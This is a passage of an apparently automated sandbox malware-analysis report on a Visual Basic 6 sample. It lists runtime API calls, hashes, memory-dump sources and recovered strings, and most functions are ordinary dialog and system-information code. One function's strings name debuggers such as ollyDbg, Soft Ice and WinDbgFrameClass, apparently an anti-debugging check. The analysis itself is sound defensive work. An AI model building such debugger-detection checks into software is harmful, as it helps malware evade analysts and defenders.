                                                                    • Instruction Fuzzy Hash: AFB00135266A80CFD296DB0AC194F5173F8FB04A41F4654F0E4458BA62C738A900CE40
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401526), ref: 0054E6D1
                                                                    • __vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,0000000B,00000000,?,?,?,?,00401526), ref: 0054E6F9
                                                                    • __vbaVarCopy.MSVBVM60 ref: 0054E734
                                                                    • __vbaStrCat.MSVBVM60(0040AF68,0040B0A8), ref: 0054E743
                                                                    • __vbaStrMove.MSVBVM60(0040AF68,0040B0A8), ref: 0054E74D
                                                                    • __vbaStrCat.MSVBVM60(0040AF70,00000000,0040AF68,0040B0A8), ref: 0054E758
                                                                    • __vbaStrMove.MSVBVM60(0040AF70,00000000,0040AF68,0040B0A8), ref: 0054E762
                                                                    • __vbaStrCat.MSVBVM60(0040B0B0,00000000,0040AF70,00000000,0040AF68,0040B0A8), ref: 0054E76D
                                                                    • __vbaStrMove.MSVBVM60(0040B0B0,00000000,0040AF70,00000000,0040AF68,0040B0A8), ref: 0054E777
                                                                    • __vbaStrCat.MSVBVM60(0040B0B8,00000000,0040B0B0,00000000,0040AF70,00000000,0040AF68,0040B0A8), ref: 0054E782
                                                                    • __vbaStrMove.MSVBVM60(0040B0B8,00000000,0040B0B0,00000000,0040AF70,00000000,0040AF68,0040B0A8), ref: 0054E78C
                                                                    • __vbaStrCat.MSVBVM60(0040B0C0,00000000,0040B0B8,00000000,0040B0B0,00000000,0040AF70,00000000,0040AF68,0040B0A8), ref: 0054E797
                                                                    • __vbaVarZero.MSVBVM60(0040B0C0,00000000,0040B0B8,00000000,0040B0B0,00000000,0040AF70,00000000,0040AF68,0040B0A8), ref: 0054E7CC
                                                                    • __vbaStrCat.MSVBVM60(0040A7FC,0040B0A8,0040B0C0,00000000,0040B0B8,00000000,0040B0B0,00000000,0040AF70,00000000,0040AF68,0040B0A8), ref: 0054E7DB
                                                                    • __vbaStrMove.MSVBVM60(0040A7FC,0040B0A8,0040B0C0,00000000,0040B0B8,00000000,0040B0B0,00000000,0040AF70,00000000,0040AF68,0040B0A8), ref: 0054E7E5
                                                                    • __vbaStrCat.MSVBVM60(0040A804,00000000,0040A7FC,0040B0A8,0040B0C0,00000000,0040B0B8,00000000,0040B0B0,00000000,0040AF70,00000000,0040AF68,0040B0A8), ref: 0054E7F0
                                                                    • __vbaStrMove.MSVBVM60(0040A804,00000000,0040A7FC,0040B0A8,0040B0C0,00000000,0040B0B8,00000000,0040B0B0,00000000,0040AF70,00000000,0040AF68,0040B0A8), ref: 0054E7FA
                                                                    • __vbaStrCat.MSVBVM60(0040B0B0,00000000,0040A804,00000000,0040A7FC,0040B0A8,0040B0C0,00000000,0040B0B8,00000000,0040B0B0,00000000,0040AF70,00000000,0040AF68,0040B0A8), ref: 0054E805
                                                                    • __vbaStrMove.MSVBVM60(0040B0B0,00000000,0040A804,00000000,0040A7FC,0040B0A8,0040B0C0,00000000,0040B0B8,00000000,0040B0B0,00000000,0040AF70,00000000,0040AF68,0040B0A8), ref: 0054E80F
                                                                    • __vbaStrCat.MSVBVM60(0040B0B8,00000000,0040B0B0,00000000,0040A804,00000000,0040A7FC,0040B0A8,0040B0C0,00000000,0040B0B8,00000000,0040B0B0,00000000,0040AF70,00000000), ref: 0054E81A
                                                                    • __vbaStrMove.MSVBVM60(0040B0B8,00000000,0040B0B0,00000000,0040A804,00000000,0040A7FC,0040B0A8,0040B0C0,00000000,0040B0B8,00000000,0040B0B0,00000000,0040AF70,00000000), ref: 0054E824
                                                                    • __vbaStrCat.MSVBVM60(0040B0C0,00000000,0040B0B8,00000000,0040B0B0,00000000,0040A804,00000000,0040A7FC,0040B0A8,0040B0C0,00000000,0040B0B8,00000000,0040B0B0,00000000), ref: 0054E82F
                                                                    • __vbaVarZero.MSVBVM60(0040B0C0,00000000,0040B0B8,00000000,0040B0B0,00000000,0040A804,00000000,0040A7FC,0040B0A8,0040B0C0,00000000,0040B0B8,00000000,0040B0B0,00000000), ref: 0054E864
                                                                    • #698.MSVBVM60(?,00000049,0040B0C0,00000000,0040B0B8,00000000,0040B0B0,00000000,0040A804,00000000,0040A7FC,0040B0A8,0040B0C0,00000000,0040B0B8,00000000), ref: 0054E86F
                                                                    • #698.MSVBVM60(?,00000044,?,00000049,0040B0C0,00000000,0040B0B8,00000000,0040B0B0,00000000,0040A804,00000000,0040A7FC,0040B0A8,0040B0C0,00000000), ref: 0054E87A
                                                                    • #698.MSVBVM60(?,00000041,?,00000044,?,00000049,0040B0C0,00000000,0040B0B8,00000000,0040B0B0,00000000,0040A804,00000000,0040A7FC,0040B0A8), ref: 0054E888
                                                                    • __vbaVarCat.MSVBVM60(?,?,?,?,00000041,?,00000044,?,00000049,0040B0C0,00000000,0040B0B8,00000000,0040B0B0,00000000,0040A804), ref: 0054E899
                                                                    • __vbaVarCat.MSVBVM60(?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049,0040B0C0,00000000,0040B0B8,00000000), ref: 0054E8AD
                                                                    • __vbaVarZero.MSVBVM60(?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049,0040B0C0,00000000,0040B0B8,00000000), ref: 0054E8CE
                                                                    • __vbaVarCopy.MSVBVM60(?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049,0040B0C0,00000000,0040B0B8,00000000), ref: 0054E907
                                                                    • __vbaVarCopy.MSVBVM60(?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049,0040B0C0,00000000,0040B0B8,00000000), ref: 0054E940
                                                                    • __vbaVarCopy.MSVBVM60(?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049,0040B0C0,00000000,0040B0B8,00000000), ref: 0054E979
                                                                    • __vbaVarCopy.MSVBVM60(?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049,0040B0C0,00000000,0040B0B8,00000000), ref: 0054E9B2
                                                                    • __vbaStrCat.MSVBVM60(0040A6F0,0040B138,?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049,0040B0C0,00000000), ref: 0054E9C1
                                                                    • __vbaStrMove.MSVBVM60(0040A6F0,0040B138,?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049,0040B0C0,00000000), ref: 0054E9CB
                                                                    • __vbaStrCat.MSVBVM60(0040A6F0,00000000,0040A6F0,0040B138,?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049), ref: 0054E9D6
                                                                    • __vbaStrMove.MSVBVM60(0040A6F0,00000000,0040A6F0,0040B138,?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049), ref: 0054E9E0
                                                                    • __vbaStrCat.MSVBVM60(0040B140,00000000,0040A6F0,00000000,0040A6F0,0040B138,?,?,00000000,?,?,?,?,00000041,?,00000044), ref: 0054E9EB
                                                                    • __vbaStrMove.MSVBVM60(0040B140,00000000,0040A6F0,00000000,0040A6F0,0040B138,?,?,00000000,?,?,?,?,00000041,?,00000044), ref: 0054E9F5
                                                                    • __vbaStrCat.MSVBVM60(0040B0B8,00000000,0040B140,00000000,0040A6F0,00000000,0040A6F0,0040B138,?,?,00000000,?,?,?,?,00000041), ref: 0054EA00
                                                                    • __vbaStrMove.MSVBVM60(0040B0B8,00000000,0040B140,00000000,0040A6F0,00000000,0040A6F0,0040B138,?,?,00000000,?,?,?,?,00000041), ref: 0054EA0A
                                                                    • __vbaStrCat.MSVBVM60(0040B0C0,00000000,0040B0B8,00000000,0040B140,00000000,0040A6F0,00000000,0040A6F0,0040B138,?,?,00000000,?,?,?), ref: 0054EA15
                                                                    • __vbaVarZero.MSVBVM60(0040B0C0,00000000,0040B0B8,00000000,0040B140,00000000,0040A6F0,00000000,0040A6F0,0040B138,?,?,00000000,?,?,?), ref: 0054EA4A
                                                                    • __vbaVarCopy.MSVBVM60(0040B0C0,00000000,0040B0B8,00000000,0040B140,00000000,0040A6F0,00000000,0040A6F0,0040B138,?,?,00000000,?,?,?), ref: 0054EA83
                                                                    • __vbaVarCopy.MSVBVM60(0040B0C0,00000000,0040B0B8,00000000,0040B140,00000000,0040A6F0,00000000,0040A6F0,0040B138,?,?,00000000,?,?,?), ref: 0054EABC
                                                                    • __vbaVarCopy.MSVBVM60(0040B0C0,00000000,0040B0B8,00000000,0040B140,00000000,0040A6F0,00000000,0040A6F0,0040B138,?,?,00000000,?,?,?), ref: 0054EAF5
                                                                    • #601.MSVBVM60(?,?,0040B0C0,00000000,0040B0B8,00000000,0040B140,00000000,0040A6F0,00000000,0040A6F0,0040B138,?,?,00000000,?), ref: 0054EB08
                                                                    • __vbaErase.MSVBVM60(00000000,?,?,?,0040B0C0,00000000,0040B0B8,00000000,0040B140,00000000,0040A6F0,00000000,0040A6F0,0040B138,?,?), ref: 0054EB16
                                                                    • __vbaAryVar.MSVBVM60(0000200C,?,00000000,?,?,?,0040B0C0,00000000,0040B0B8,00000000,0040B140,00000000,0040A6F0,00000000,0040A6F0,0040B138), ref: 0054EB27
                                                                    • __vbaAryCopy.MSVBVM60(?,?,0000200C,?,00000000,?,?,?,0040B0C0,00000000,0040B0B8,00000000,0040B140,00000000,0040A6F0,00000000), ref: 0054EB3D
                                                                    • __vbaFreeStrList.MSVBVM60(0000000C,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000200C), ref: 0054EB74
                                                                    • __vbaFreeVarList.MSVBVM60(00000005,?,?,?,?,?), ref: 0054EB98
                                                                    • __vbaStrVarVal.MSVBVM60(?,?), ref: 0054EBEF
                                                                    • #644.MSVBVM60(00000000,?,?), ref: 0054EBF5
                                                                    • #644.MSVBVM60(00000000,00000000,?,?), ref: 0054EC02
                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000000,?,?), ref: 0054EC19
                                                                    • __vbaFreeStr.MSVBVM60(?,00000000,00000000,00000000,?,?), ref: 0054EC36
                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,0054ECEF), ref: 0054ECE9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$Move$Copy$Zero$#698Free$#644List$#601ChkstkDestructEraseErrorRedimSystem
                                                                    • String ID: ObsidianGUI$Rock Debugger$Soft Ice$WinDbgFrameClass$WindDbg$Zeta Debugger$ollyDbg
                                                                    • API String ID: 965276749-533602695
                                                                    • Opcode ID: 535461d0d3dba66fe792f3f28f53d9799e21b43aaef16f86d1ec65e962ba0c62
                                                                    • Instruction ID: 76f99efeba4eef2d943f50b1dde0d10957f91cbeb16511204edbb9c0a1b0b59e
                                                                    • Opcode Fuzzy Hash: 535461d0d3dba66fe792f3f28f53d9799e21b43aaef16f86d1ec65e962ba0c62
                                                                    • Instruction Fuzzy Hash: E0F121719002189BDB15DFA4CC85FEE73B8BF44344F1085AAF506BB291DB749A84CF59
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401526), ref: 005C583A
                                                                    • __vbaNew2.MSVBVM60(0040B6BC,005C9B40,?,?,?,?,00401526), ref: 005C587B
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B6AC,00000014), ref: 005C58C8
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BE80,00000058), ref: 005C5909
                                                                    • __vbaChkstk.MSVBVM60(00000000,?,0040BE80,00000058), ref: 005C592E
                                                                    • #689.MSVBVM60(?,Options,Show Tips at Startup), ref: 005C5949
                                                                    • __vbaStrMove.MSVBVM60(?,Options,Show Tips at Startup), ref: 005C5953
                                                                    • __vbaI4Str.MSVBVM60(00000000,?,Options,Show Tips at Startup), ref: 005C5959
                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,?,Options,Show Tips at Startup), ref: 005C596B
                                                                    • __vbaFreeObj.MSVBVM60(?,?,00401526), ref: 005C5976
                                                                    • __vbaNew2.MSVBVM60(0040B6BC,005C9B40), ref: 005C5998
                                                                    • __vbaObjSetAddref.MSVBVM60(?,00401418), ref: 005C59C5
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B6AC,00000010), ref: 005C59EE
                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,0040B6AC,00000010), ref: 005C5A05
                                                                    Strings
                                                                    • file was not found? , xrefs: 005C5C27
                                                                    • That the , xrefs: 005C5C0D
                                                                    • Options, xrefs: 005C5941
                                                                    • Create a text file named , xrefs: 005C5C66
                                                                    • Show Tips at Startup, xrefs: 005C593C
                                                                    • Then place it in the same directory as the application. , xrefs: 005C5CA5
                                                                    • using NotePad with 1 tip per line. , xrefs: 005C5C90
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$CheckFreeHresult$ChkstkNew2$#689AddrefListMove
                                                                    • String ID: file was not found? $ using NotePad with 1 tip per line. $Create a text file named $Options$Show Tips at Startup$That the $Then place it in the same directory as the application.
                                                                    • API String ID: 481385995-1258388981
                                                                    • Opcode ID: 0d3bdb3a3ddaa093caad53cdc2934e9cd2f05657764948c2873f6b3a6cee12d5
                                                                    • Instruction ID: 433c5d48ff34c4ad0d4b968faacfe28cd4f0da8129ffc6d96821f5ce2143a711
                                                                    • Opcode Fuzzy Hash: 0d3bdb3a3ddaa093caad53cdc2934e9cd2f05657764948c2873f6b3a6cee12d5
                                                                    • Instruction Fuzzy Hash: 8DF1D271D00208AFDB11EBA5CC45FDEBBB9BF04304F20456AE505BB2A1EB795A84DF94
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401526), ref: 005C6141
                                                                    • __vbaNew2.MSVBVM60(0040B6BC,005C9B40,?,?,?,?,00401526), ref: 005C6182
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B6AC,00000014), ref: 005C61CF
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BE80,00000060), ref: 005C6210
                                                                    • __vbaStrCat.MSVBVM60(?,Info zu ), ref: 005C622C
                                                                    • __vbaStrMove.MSVBVM60(?,Info zu ), ref: 005C6236
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00401458,0040C0A4,00000054), ref: 005C625F
                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 005C627D
                                                                    • __vbaFreeObj.MSVBVM60(?,?,00401526), ref: 005C6288
                                                                    • __vbaObjSet.MSVBVM60(?,00000000,?,?,00401526), ref: 005C62A0
                                                                    • __vbaNew2.MSVBVM60(0040B6BC,005C9B40,?,00000000,?,?,00401526), ref: 005C62BE
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B6AC,00000014), ref: 005C630B
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BE80,000000B8), ref: 005C6352
                                                                    • __vbaNew2.MSVBVM60(0040B6BC,005C9B40), ref: 005C6379
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B6AC,00000014), ref: 005C63C6
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BE80,000000C0), ref: 005C640D
                                                                    • __vbaNew2.MSVBVM60(0040B6BC,005C9B40), ref: 005C6434
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B6AC,00000014), ref: 005C6481
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BE80,000000C8), ref: 005C64C8
                                                                    • __vbaStrI2.MSVBVM60(?,Version ), ref: 005C64E4
                                                                    • __vbaStrMove.MSVBVM60(?,Version ), ref: 005C64EE
                                                                    • __vbaStrCat.MSVBVM60(00000000,?,Version ), ref: 005C64F4
                                                                    • __vbaStrMove.MSVBVM60(00000000,?,Version ), ref: 005C64FE
                                                                    • __vbaStrCat.MSVBVM60(0040C274,00000000,00000000,?,Version ), ref: 005C6509
                                                                    • __vbaStrMove.MSVBVM60(0040C274,00000000,00000000,?,Version ), ref: 005C6513
                                                                    • __vbaStrI2.MSVBVM60(?,00000000,0040C274,00000000,00000000,?,Version ), ref: 005C651C
                                                                    • __vbaStrMove.MSVBVM60(?,00000000,0040C274,00000000,00000000,?,Version ), ref: 005C6526
                                                                    • __vbaStrCat.MSVBVM60(00000000,?,00000000,0040C274,00000000,00000000,?,Version ), ref: 005C652C
                                                                    • __vbaStrMove.MSVBVM60(00000000,?,00000000,0040C274,00000000,00000000,?,Version ), ref: 005C6536
                                                                    • __vbaStrCat.MSVBVM60(0040C274,00000000,00000000,?,00000000,0040C274,00000000,00000000,?,Version ), ref: 005C6541
                                                                    • __vbaStrMove.MSVBVM60(0040C274,00000000,00000000,?,00000000,0040C274,00000000,00000000,?,Version ), ref: 005C654B
                                                                    • __vbaStrI2.MSVBVM60(?,00000000,0040C274,00000000,00000000,?,00000000,0040C274,00000000,00000000,?,Version ), ref: 005C6554
                                                                    • __vbaStrMove.MSVBVM60(?,00000000,0040C274,00000000,00000000,?,00000000,0040C274,00000000,00000000,?,Version ), ref: 005C655E
                                                                    • __vbaStrCat.MSVBVM60(00000000,?,00000000,0040C274,00000000,00000000,?,00000000,0040C274,00000000,00000000,?,Version ), ref: 005C6564
                                                                    • __vbaStrMove.MSVBVM60(00000000,?,00000000,0040C274,00000000,00000000,?,00000000,0040C274,00000000,00000000,?,Version ), ref: 005C656E
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040C038,00000054), ref: 005C65A9
                                                                    • __vbaFreeStrList.MSVBVM60(00000008,?,00000000,?,?,?,?,?,?), ref: 005C65DF
                                                                    • __vbaFreeObjList.MSVBVM60(00000004,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005C65F9
                                                                    • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005C6614
                                                                    • __vbaNew2.MSVBVM60(0040B6BC,005C9B40,?,00000000), ref: 005C662F
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040B6AC,00000014), ref: 005C667C
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BE80,00000060), ref: 005C66BD
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040C038,00000054), ref: 005C66F7
                                                                    • __vbaFreeStr.MSVBVM60 ref: 005C670E
                                                                    • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 005C671D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$CheckHresult$Move$Free$New2$List$Chkstk
                                                                    • String ID: Info zu $Version
                                                                    • API String ID: 2866532796-1133326459
                                                                    • Opcode ID: a55e6215144b06f3398678e699e831a07d42c107491f5a9e53bbe1f101202dd9
                                                                    • Instruction ID: 65e762f10ee72ad1abc78a5d33e0b93658809245fd7762c172c9f7501d95223a
                                                                    • Opcode Fuzzy Hash: a55e6215144b06f3398678e699e831a07d42c107491f5a9e53bbe1f101202dd9
                                                                    • Instruction Fuzzy Hash: DF12B071900218EFDB11EFE4C889F9DBBB9FB08304F1045AAE505BB2A1DB755A88DF54
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401526), ref: 005C6ADB
                                                                    • __vbaStrToAnsi.MSVBVM60(?,00401526,00000000,0002003F,?,?,?,?,?,00401526), ref: 005C6B13
                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,?,00401526,00000000,0002003F,?,?,?,?,?,00401526), ref: 005C6B29
                                                                    • __vbaStrToUnicode.MSVBVM60(00401526,00000000,?,00000000,?,00401526,00000000,0002003F,?,?,?,?,?,00401526), ref: 005C6B34
                                                                    • __vbaFreeStr.MSVBVM60(00401526,00000000,?,00000000,?,00401526,00000000,0002003F,?,?,?,?,?,00401526), ref: 005C6B45
                                                                    • #606.MSVBVM60(00000400,00000002), ref: 005C6B69
                                                                    • __vbaStrMove.MSVBVM60(00000400,00000002), ref: 005C6B73
                                                                    • __vbaFreeVar.MSVBVM60(00000400,00000002), ref: 005C6B7B
                                                                    • __vbaStrToAnsi.MSVBVM60(?,00401526,00000400,00000400,00000002), ref: 005C6B92
                                                                    • __vbaStrToAnsi.MSVBVM60(00000000,?,00000000,?,00000000,?,00401526,00000400,00000400,00000002), ref: 005C6BA7
                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,00000000,?,00000000,?,00401526,00000400,00000400,00000002), ref: 005C6BBB
                                                                    • __vbaStrToUnicode.MSVBVM60(?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,00401526,00000400,00000400,00000002), ref: 005C6BC6
                                                                    • __vbaStrToUnicode.MSVBVM60(00401526,?,?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,00401526,00000400,00000400,00000002), ref: 005C6BD2
                                                                    • __vbaFreeStrList.MSVBVM60(00000002,00000000,?,00401526,?,?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,00401526), ref: 005C6BEA
                                                                    • __vbaStrCopy.MSVBVM60(00401526,00000000,?,00000000,?,00401526,00000000,0002003F,?), ref: 005C6EC3
                                                                    • __vbaSetSystemError.MSVBVM60(?), ref: 005C6EDB
                                                                    • __vbaFreeStr.MSVBVM60(005C6F2D,?), ref: 005C6F27
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$Free$AnsiErrorSystemUnicode$#606ChkstkCopyListMove
                                                                    • String ID:
                                                                    • API String ID: 3225542645-0
                                                                    • Opcode ID: a3941584acae2e6668564921ef6d8b9569edf7b7fe5e00e115fc65a62e0eefff
                                                                    • Instruction ID: 99b08a2eb679d0c45a64f2dba89f1998bb4c365995d42df44c2d087ccb88bdf1
                                                                    • Opcode Fuzzy Hash: a3941584acae2e6668564921ef6d8b9569edf7b7fe5e00e115fc65a62e0eefff
                                                                    • Instruction Fuzzy Hash: E2C1A1B1D00219ABDB11EFE5C885FDEBBB8BF04304F00856AF515B71A1DB399A458F64
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401526), ref: 005C67B6
                                                                    • __vbaOnError.MSVBVM60(00000001,?,?,?,?,00401526), ref: 005C67E3
                                                                    • __vbaStrCopy.MSVBVM60(00000001,?,?,?,?,00401526), ref: 005C67F0
                                                                    • __vbaStrCopy.MSVBVM60(00000001,?,?,?,?,00401526), ref: 005C67FD
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040C0D4,000006FC), ref: 005C6856
                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,00000001), ref: 005C6882
                                                                    • __vbaStrCopy.MSVBVM60(?,?,00401526), ref: 005C68A2
                                                                    • __vbaStrCopy.MSVBVM60(?,?,00401526), ref: 005C68AF
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040C0D4,000006FC), ref: 005C6908
                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 005C6934
                                                                    • __vbaStrCat.MSVBVM60(\MSINFO32.EXE,?,?,?,?,?,?,00401526), ref: 005C694F
                                                                    • #645.MSVBVM60(00000008,00000000), ref: 005C6964
                                                                    • __vbaStrMove.MSVBVM60(00000008,00000000), ref: 005C696E
                                                                    • __vbaStrCmp.MSVBVM60(0040AC10,00000000,00000008,00000000), ref: 005C6979
                                                                    • __vbaFreeStr.MSVBVM60(0040AC10,00000000,00000008,00000000), ref: 005C6990
                                                                    • __vbaFreeVar.MSVBVM60(0040AC10,00000000,00000008,00000000), ref: 005C6998
                                                                    • __vbaStrCat.MSVBVM60(\MSINFO32.EXE,?,0040AC10,00000000,00000008,00000000), ref: 005C69B0
                                                                    • __vbaStrMove.MSVBVM60(\MSINFO32.EXE,?,0040AC10,00000000,00000008,00000000), ref: 005C69BA
                                                                    • #600.MSVBVM60(00004008,00000001,?,?,?,?,?,?,?,?,?,?,\MSINFO32.EXE,?,0040AC10,00000000), ref: 005C69DA
                                                                    • __vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,0040AC10,00000000,00000008,00000000), ref: 005C6A25
                                                                    • #595.MSVBVM60(?,00000000,0000000A,0000000A,0000000A), ref: 005C6A3C
                                                                    • __vbaFreeVarList.MSVBVM60(00000004,?,0000000A,0000000A,0000000A,?,00000000,0000000A,0000000A,0000000A), ref: 005C6A53
                                                                    • __vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401526), ref: 005C6A5B
                                                                    • __vbaFreeStr.MSVBVM60(005C6A9E,?,?,?,?,?,?,?,?,?,?,00401526), ref: 005C6A98
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1705699879.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1705650867.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705664501.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705685835.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705957733.00000000005CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_VYLigyTDuW.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$Free$Copy$List$CheckHresultMove$#595#600#645ChkstkErrorExitProc
                                                                    • String ID: MSINFO$PATH$SOFTWARE\Microsoft\Shared Tools Location$SOFTWARE\Microsoft\Shared Tools\MSINFO$Systeminformation are not available!$\MSINFO32.EXE
                                                                    • API String ID: 2627723877-2418805842
                                                                    • Opcode ID: fd0153f60f77bf9ab3c850f65730bdcf1eb54a12ba80c03e667e45d87d5b2618
                                                                    • Instruction ID: e0d43b2c2445254daf4f9b22513640172d773f6a7b4b4c150fb39420676b4479
                                                                    • Opcode Fuzzy Hash: fd0153f60f77bf9ab3c850f65730bdcf1eb54a12ba80c03e667e45d87d5b2618
